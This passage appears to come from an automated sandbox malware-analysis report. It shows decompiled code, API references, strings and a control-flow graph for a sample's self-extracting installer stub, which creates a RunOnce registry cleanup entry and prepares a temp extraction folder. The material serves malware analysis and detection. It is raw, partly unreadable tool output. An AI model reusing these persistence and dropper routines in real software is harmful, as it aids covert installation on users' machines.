                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E00DE6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00DE171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E00DE658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xde9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xde91e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xde91e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xde8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        							E00DE171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E00DE658A( &_v268, 0x104, 0xde1140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xde8530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00de202a
                                                                                                                                                                                                        0x00de2035
                                                                                                                                                                                                        0x00de203c
                                                                                                                                                                                                        0x00de2041
                                                                                                                                                                                                        0x00de2050
                                                                                                                                                                                                        0x00de205f
                                                                                                                                                                                                        0x00de2064
                                                                                                                                                                                                        0x00de206f
                                                                                                                                                                                                        0x00de208c
                                                                                                                                                                                                        0x00de2094
                                                                                                                                                                                                        0x00de2257
                                                                                                                                                                                                        0x00de2266
                                                                                                                                                                                                        0x00de2266
                                                                                                                                                                                                        0x00de209a
                                                                                                                                                                                                        0x00de209b
                                                                                                                                                                                                        0x00de209d
                                                                                                                                                                                                        0x00de20aa
                                                                                                                                                                                                        0x00de20af
                                                                                                                                                                                                        0x00de20c9
                                                                                                                                                                                                        0x00de20d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de20d3
                                                                                                                                                                                                        0x00de20da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de20da
                                                                                                                                                                                                        0x00de20e2
                                                                                                                                                                                                        0x00de2103
                                                                                                                                                                                                        0x00de210e
                                                                                                                                                                                                        0x00de2116
                                                                                                                                                                                                        0x00de2122
                                                                                                                                                                                                        0x00de2128
                                                                                                                                                                                                        0x00de212c
                                                                                                                                                                                                        0x00de2179
                                                                                                                                                                                                        0x00de2194
                                                                                                                                                                                                        0x00de21de
                                                                                                                                                                                                        0x00de21e4
                                                                                                                                                                                                        0x00de2256
                                                                                                                                                                                                        0x00de2256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2256
                                                                                                                                                                                                        0x00de2196
                                                                                                                                                                                                        0x00de2196
                                                                                                                                                                                                        0x00de219c
                                                                                                                                                                                                        0x00de219f
                                                                                                                                                                                                        0x00de219f
                                                                                                                                                                                                        0x00de21a1
                                                                                                                                                                                                        0x00de21a2
                                                                                                                                                                                                        0x00de21a6
                                                                                                                                                                                                        0x00de21a8
                                                                                                                                                                                                        0x00de21b0
                                                                                                                                                                                                        0x00de21b0
                                                                                                                                                                                                        0x00de21b2
                                                                                                                                                                                                        0x00de21b3
                                                                                                                                                                                                        0x00de21bc
                                                                                                                                                                                                        0x00de21c7
                                                                                                                                                                                                        0x00de21cb
                                                                                                                                                                                                        0x00de21f1
                                                                                                                                                                                                        0x00de21f6
                                                                                                                                                                                                        0x00de21fd
                                                                                                                                                                                                        0x00de21ff
                                                                                                                                                                                                        0x00de21ff
                                                                                                                                                                                                        0x00de2204
                                                                                                                                                                                                        0x00de2213
                                                                                                                                                                                                        0x00de2218
                                                                                                                                                                                                        0x00de221d
                                                                                                                                                                                                        0x00de221d
                                                                                                                                                                                                        0x00de2220
                                                                                                                                                                                                        0x00de2220
                                                                                                                                                                                                        0x00de2222
                                                                                                                                                                                                        0x00de2223
                                                                                                                                                                                                        0x00de2229
                                                                                                                                                                                                        0x00de223d
                                                                                                                                                                                                        0x00de2249
                                                                                                                                                                                                        0x00de2250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2250
                                                                                                                                                                                                        0x00de21d2
                                                                                                                                                                                                        0x00de21d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de21d9
                                                                                                                                                                                                        0x00de213a
                                                                                                                                                                                                        0x00de2141
                                                                                                                                                                                                        0x00de2144
                                                                                                                                                                                                        0x00de214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2163
                                                                                                                                                                                                        0x00de2172
                                                                                                                                                                                                        0x00de2172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2163
                                                                                                                                                                                                        0x00de20ea
                                                                                                                                                                                                        0x00de20f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00DE208C
                                                                                                                                                                                                          • Part of subcall function 00DE171E: _vsnprintf.MSVCRT ref: 00DE1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00DE2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00DE223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00DE2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                        • API String ID: 178549006-1916111597
                                                                                                                                                                                                        • Opcode ID: bba55b13a430ac228d68545cc5eceb7de04bfb7906226d1016fce6a92365710a
                                                                                                                                                                                                        • Instruction ID: fb152023e905b4917375cea8eb818ec65741f076a92c4fd5d9f9ae1f86cc27d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bba55b13a430ac228d68545cc5eceb7de04bfb7906226d1016fce6a92365710a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0510771A00395AFDB21BF66DC89FFA773CEB50700F0401A4FA49EA254DA719E498A70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 de55a0-de55d9 call de468f LocalAlloc 235 de55fd-de560c call de468f 232->235 236 de55db-de55f1 call de44b9 call de6285 232->236 241 de560e-de5630 call de44b9 LocalFree 235->241 242 de5632-de5643 lstrcmpA 235->242 248 de55f6-de55f8 236->248 241->248 246 de564b-de5659 LocalFree 242->246 247 de5645 242->247 250 de565b-de565d 246->250 251 de5696-de569c 246->251 247->246 252 de58b7-de58c7 call de6ce0 248->252 255 de565f-de5667 250->255 256 de5669 250->256 253 de589f-de58b5 call de6517 251->253 254 de56a2-de56a8 251->254 253->252 254->253 259 de56ae-de56c1 GetTempPathA 254->259 255->256 260 de566b-de567a call de5467 255->260 256->260 263 de56f3-de5711 call de1781 259->263 264 de56c3-de56c9 call de5467 259->264 269 de589b-de589d 260->269 270 de5680-de5691 call de44b9 260->270 274 de586c-de5890 GetWindowsDirectoryA call de597d 263->274 275 de5717-de5729 GetDriveTypeA 263->275 272 de56ce-de56d0 264->272 269->252 270->248 272->269 276 de56d6-de56df call de2630 272->276 274->263 289 de5896 274->289 278 de572b-de572e 275->278 279 de5730-de5740 GetFileAttributesA 275->279 276->263 290 de56e1-de56ed call de5467 276->290 278->279 282 de5742-de5745 278->282 279->282 283 de577e-de578f call de597d 279->283 287 de576b 282->287 288 de5747-de574f 282->288 295 de57b2-de57bf call de2630 283->295 296 de5791-de579e call de2630 283->296 292 de5771-de5779 287->292 288->292 293 de5751-de5753 288->293 289->269 290->263 290->269 298 de5864-de5866 292->298 293->292 297 de5755-de5762 call de6952 293->297 307 de57d3-de57f8 call de658a GetFileAttributesA 295->307 308 de57c1-de57cd GetWindowsDirectoryA 295->308 296->287 306 de57a0-de57b0 call de597d 296->306 297->287 309 de5764-de5769 297->309 298->274 298->275 306->287 306->295 314 de580a 307->314 315 de57fa-de5808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 de580d-de580f 314->316 315->316 317 de5827-de585c SetFileAttributesA call de1781 call de5467 316->317 318 de5811-de5825 316->318 317->269 323 de585e 317->323 318->298 323->298
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00DE55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E00DE468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E00DE468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xde9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xde8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xde8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00DE6517(_t82, 0x7d2, 0, E00DE3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xde9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xde91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xde91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00DE1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E00DE6952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E00DE597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E00DE2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E00DE658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0xde91e4;
                                                                                                                                                                                                        																					E00DE1781(0xde91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E00DE5467(0xde91e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E00DE2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E00DE597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E00DE5467(0xde91e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xde91e4;
                                                                                                                                                                                                        											_t70 = E00DE2630(0, 0xde91e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xde91e4;
                                                                                                                                                                                                        												_t71 = E00DE5467(0xde91e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E00DE597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xde8b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E00DE5467(0xde8b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E00DE44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
